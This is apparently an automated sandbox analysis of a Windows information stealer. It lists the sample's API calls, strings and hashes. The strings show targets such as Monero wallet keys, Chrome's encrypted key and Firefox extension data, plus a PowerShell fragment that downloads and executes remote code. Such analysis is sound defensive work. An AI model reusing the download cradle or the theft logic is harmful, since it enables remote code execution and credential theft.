                               • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 4a0a052e1bc2f912dcdcbac072fdc5341bd980537908fb53dc733cce4318ca76
                              • Instruction ID: 0578c9d78606f1d3a04dc1e0b4adf39fc5a5d40eb7790923cd4b31680d6cee88
                              • Opcode Fuzzy Hash: 4a0a052e1bc2f912dcdcbac072fdc5341bd980537908fb53dc733cce4318ca76
                              • Instruction Fuzzy Hash: DBF05E31A04269EFD344DFE0E90A72C7B70FB14703F04029BE609C6290EE704B529BD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00854FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00854FD1
                              • InternetOpenA.WININET(00870DDF,00000000,00000000,00000000,00000000), ref: 00854FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00855011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00855041
                              • InternetCloseHandle.WININET(?), ref: 008550B9
                              • InternetCloseHandle.WININET(?), ref: 008550C6
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 104dcb798baa48a72843b08389535dd4a0fce0e392406e5abfb868537de4801f
                              • Instruction ID: cb52479619bcd057bd024af95b68f1548632a3031098d16c83baf6327cc10771
                              • Opcode Fuzzy Hash: 104dcb798baa48a72843b08389535dd4a0fce0e392406e5abfb868537de4801f
                              • Instruction Fuzzy Hash: 8531FCB4A4021CABDB20CF94DC85BDDB7B4FB48705F5081D9EB09A7281CB706AC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00868426
                              • wsprintfA.USER32 ref: 00868459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0086847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868499
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,015CDE38,00000000,000F003F,?,00000400), ref: 008684EC
                              • lstrlen.KERNEL32(?), ref: 00868501
                              • RegQueryValueExA.ADVAPI32(00000000,015CDE50,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00870B34), ref: 00868599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086861A
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: d9d15b16e2e14a25201ca8c49fb0bbd501235f204990413c8ea87b8daf31fd97
                              • Instruction ID: 08fe5059392b81719258e90a558786ec948c15c110c14ec3a88cb4c866264bfa
                              • Opcode Fuzzy Hash: d9d15b16e2e14a25201ca8c49fb0bbd501235f204990413c8ea87b8daf31fd97
                              • Instruction Fuzzy Hash: ED21EB71A1021C9BDB24DB54DC85FE9B3B8FB58700F00C5D9E609A6140DF716A86CFD5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,015BB968,00000000,00020119,00000000), ref: 008676DD
                              • RegQueryValueExA.ADVAPI32(00000000,015CDF58,00000000,00000000,?,000000FF), ref: 008676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00867708
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 11197373d0212bf705643c93aa4a219c59498fd9cc6fec67b4da1c1e07971de4
                              • Instruction ID: a5cbab506c03e344a5199a5f9ac19583c7f9bab676ec0985d235f5ff9e9e8731
                              • Opcode Fuzzy Hash: 11197373d0212bf705643c93aa4a219c59498fd9cc6fec67b4da1c1e07971de4
                              • Instruction Fuzzy Hash: D6014FB5B04208BBDB00DBE4DD4AF6AB7B8EB58705F108056FA05D7290EA7099058BD1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0086773B
                              • RegOpenKeyExA.ADVAPI32(80000002,015BB968,00000000,00020119,008676B9), ref: 0086775B
                              • RegQueryValueExA.ADVAPI32(008676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0086777A
                              • RegCloseKey.ADVAPI32(008676B9), ref: 00867784
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 83285946bedec364b692ba4faa6cb3556f523ca541df31dca3a87109f9274ebe
                              • Instruction ID: e60c01d77f730933ad2e6cf9fd26bd1d2da49c7e343b64288fbd0cd8e208275e
                              • Opcode Fuzzy Hash: 83285946bedec364b692ba4faa6cb3556f523ca541df31dca3a87109f9274ebe
                              • Instruction Fuzzy Hash: 7A01F4B9A40308FBD700DBE4DC4AFAEB7B8EB54705F108556FA05E7281DA7455018B91
                              APIs
                              • memset.MSVCRT ref: 008640D5
                              • RegOpenKeyExA.ADVAPI32(80000001,015CD678,00000000,00020119,?), ref: 008640F4
                              • RegQueryValueExA.ADVAPI32(?,015CD8F8,00000000,00000000,00000000,000000FF), ref: 00864118
                              • RegCloseKey.ADVAPI32(?), ref: 00864122
                              • lstrcat.KERNEL32(?,00000000), ref: 00864147
                              • lstrcat.KERNEL32(?,015CD850), ref: 0086415B
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 914545d5b09f35b2ff64fd2da055ed02046806ff104a63c068e81f712405e91c
                              • Instruction ID: 4d4c00422efd264611a3ce1d6c9f626591b114b86bbcc8277c51fefc76abfe90
                              • Opcode Fuzzy Hash: 914545d5b09f35b2ff64fd2da055ed02046806ff104a63c068e81f712405e91c
                              • Instruction Fuzzy Hash: B94176B69001086BDF14EBE4DC46FEE737DFB98300F00455AB61696181EE755B898BE3
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                              • LocalFree.KERNEL32(0085148F), ref: 00859A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 26660b000e2e45bb56c15e1cb472edb2119289a1581b5d49aa7d49c4f4e9117c
                              • Instruction ID: 39ad5fbaf73eb24e68720e7d4355636c46905be216c854a9b8d3c6598b7de1e4
                              • Opcode Fuzzy Hash: 26660b000e2e45bb56c15e1cb472edb2119289a1581b5d49aa7d49c4f4e9117c
                              • Instruction Fuzzy Hash: 0E3149B4A00219EFDB15CFA4C885BAE77B5FF48351F108159E902E7290DB78AA45CFA1
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: be86092c2a6ded43b8a31b218af8f15c07722e93ea7c2e7105cb4ae3aabe23d7
                              • Instruction ID: 06d063fda1ece5207838047b3e7579b0cfa8fe8b5880bf272d26ea90fbfe4e73
                              • Opcode Fuzzy Hash: be86092c2a6ded43b8a31b218af8f15c07722e93ea7c2e7105cb4ae3aabe23d7
                              • Instruction Fuzzy Hash: 8441E4B150079C5EDB258B28CC84FFBBBE8FB45708F1444A8E9CAC7182D2719A45CF60
                              APIs
                              • lstrcat.KERNEL32(?,015CD988), ref: 008647DB
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864801
                              • lstrcat.KERNEL32(?,?), ref: 00864820
                              • lstrcat.KERNEL32(?,?), ref: 00864834
                              • lstrcat.KERNEL32(?,015BB298), ref: 00864847
                              • lstrcat.KERNEL32(?,?), ref: 0086485B
                              • lstrcat.KERNEL32(?,015CD5D8), ref: 0086486F
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868D90: GetFileAttributesA.KERNEL32(00000000,?,00851B54,?,?,0087564C,?,?,00870E1F), ref: 00868D9F
                                • Part of subcall function 00864570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00864580
                                • Part of subcall function 00864570: RtlAllocateHeap.NTDLL(00000000), ref: 00864587
                                • Part of subcall function 00864570: wsprintfA.USER32 ref: 008645A6
                                • Part of subcall function 00864570: FindFirstFileA.KERNEL32(?,?), ref: 008645BD
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 452e89f9e74bb9138a06b56242406bea9efde8a4b3775dc9d74c3538a1e522bd
                              • Instruction ID: 0e0394cdea8b7087e67e85a19b393e073f141fb19ca99f16969851b80a22e7d1
                              • Opcode Fuzzy Hash: 452e89f9e74bb9138a06b56242406bea9efde8a4b3775dc9d74c3538a1e522bd
                              • Instruction Fuzzy Hash: 40316EB2A00218A7CF14FBB4DC85EE97378FB58700F44458AB31996081EE7496898B92
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00862D85
                              Strings
                              • ')", xrefs: 00862CB3
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00862D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00862CC4
                              • <, xrefs: 00862D39
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 48b755dc3363d8593869e1a8dc4622b78ceb13db02dee8bf8b34b521940797ee
                              • Instruction ID: a2b4b98f06bd7e17cd55681fadbd359d201b028d5321d57b9608420b4b7a203a
                              • Opcode Fuzzy Hash: 48b755dc3363d8593869e1a8dc4622b78ceb13db02dee8bf8b34b521940797ee
                              • Instruction Fuzzy Hash: D941CA719102089ADB18EFE4C896BEDBB74FF10300F518169E516F7192EF746A4ACF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00859F41
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 845afa8ae96800e09e3f38ce1fd186a50465f291700884d075b36b1609aae170
                              • Instruction ID: c97db1b02e616aeaae00a5961bf2049f4b62bf3aaeab5e118da54520818e420a
                              • Opcode Fuzzy Hash: 845afa8ae96800e09e3f38ce1fd186a50465f291700884d075b36b1609aae170
                              • Instruction Fuzzy Hash: 92611D70A10248DBDB18EFA8CC96BED7775FF54345F008118F90AAB291EB746A09CB52
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0086696C
                              • sscanf.NTDLL ref: 00866999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008669C0
                              • ExitProcess.KERNEL32 ref: 008669DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 183c414e3433871d438341a074a2a98cfdb87e37ca069f022755e4bdb0ff8b92
                              • Instruction ID: 5368ce4f5c4d3165021b8220faca9a347ed4f5addf9f2ff5e792e053a5d4f92a
                              • Opcode Fuzzy Hash: 183c414e3433871d438341a074a2a98cfdb87e37ca069f022755e4bdb0ff8b92
                              • Instruction Fuzzy Hash: 4321CB75E14218ABCF08EFE8E9459EEB7B9FF58300F04852AE406E3250EB345615CBA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,015BBC40,00000000,00020119,?), ref: 00867E5E
                              • RegQueryValueExA.ADVAPI32(?,015CD6B8,00000000,00000000,000000FF,000000FF), ref: 00867E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00867E92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 51b6090aca9a80a919f68537455e15a423c2623f0eaa1bee8864d3d30b6ad129
                              • Instruction ID: 170e96478eaa3d104836984273afc670f8660ae21c2dbcdc82bd13d9f4943a25
                              • Opcode Fuzzy Hash: 51b6090aca9a80a919f68537455e15a423c2623f0eaa1bee8864d3d30b6ad129
                              • Instruction Fuzzy Hash: 1B113AB2A44209EBD700CFD5DD4AFABBBB8FB44B14F10815AFA15E7280DB7558058BE1
                              APIs
                              • StrStrA.SHLWAPI(015CD898,?,?,?,0086140C,?,015CD898,00000000), ref: 0086926C
                              • lstrcpyn.KERNEL32(00A9AB88,015CD898,015CD898,?,0086140C,?,015CD898), ref: 00869290
                              • lstrlen.KERNEL32(?,?,0086140C,?,015CD898), ref: 008692A7
                              • wsprintfA.USER32 ref: 008692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: a51978c54b2d87496477787f6a61a1244d1dc3356367a48758e775404a5804de
                              • Instruction ID: e4481777130b04dc1da8688aa5b71950ff73d47df6088c45a02334825d60b545
                              • Opcode Fuzzy Hash: a51978c54b2d87496477787f6a61a1244d1dc3356367a48758e775404a5804de
                              • Instruction Fuzzy Hash: 77019375600108FFCB04DFECC999AAE7BB9EB58354F108549F9099B244CA71AA419BD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008512D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008512F5
                              • RegCloseKey.ADVAPI32(?), ref: 008512FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 4816f60d4f323edb31b40343832a1b8721e0460a8de6301260b0a4a5358fbdb6
                              • Instruction ID: 8632b1c042cfb329edcdaef48d651eef34400ea3f2ab6fd8ce4f4a0ac7745028
                              • Opcode Fuzzy Hash: 4816f60d4f323edb31b40343832a1b8721e0460a8de6301260b0a4a5358fbdb6
                              • Instruction Fuzzy Hash: 5401E6B9B40208BFDB04DFD4DC49FAEB7B8EB58701F108156FA05D7280DA759A058F91
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00866663
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00866726
                              • ExitProcess.KERNEL32 ref: 00866755
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: ca85a487b50df118bccf5ed89199e3c0067d5f2f0d1088a03acd8fe9175d09ab
                              • Instruction ID: 0960c3369f2772c63c7cc6fae211f71fe7bac18694840c44480fed0ce593fada
                              • Opcode Fuzzy Hash: ca85a487b50df118bccf5ed89199e3c0067d5f2f0d1088a03acd8fe9175d09ab
                              • Instruction Fuzzy Hash: 98314DB1901218AADB18EB94DC82BDE7B78FF14300F40419AF209B6191DF746B49CF96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00870E28,00000000,?), ref: 0086882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868836
                              • wsprintfA.USER32 ref: 00868850
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 4eef7ee9b31f185c3dd01f1cccd7304a187ac11594dfeed26718cc3478f74e34
                              • Instruction ID: 09a6ce0e903af0da465b0c0b1d255e013fd29f4eb0ec3b3a3310cb03c86125db
                              • Opcode Fuzzy Hash: 4eef7ee9b31f185c3dd01f1cccd7304a187ac11594dfeed26718cc3478f74e34
                              • Instruction Fuzzy Hash: 7F21FEB1B40208AFDB04DFD4DD49FAEBBB8FB48711F10415AF605E7280CB7999018BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0086951E,00000000), ref: 00868D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00868D62
                              • wsprintfW.USER32 ref: 00868D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0085A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0085A6BC
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0085A743
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085D481
                              • lstrlen.KERNEL32(00000000), ref: 0085D698
                              • lstrlen.KERNEL32(00000000), ref: 0085D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0085D72B
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085D801
                              • lstrlen.KERNEL32(00000000), ref: 0085D99F
                              • lstrlen.KERNEL32(00000000), ref: 0085D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0085DA32
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00871580,00870D92), ref: 0085F54C
                              • lstrlen.KERNEL32(00000000), ref: 0085F56B
                              Strings
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00859D39
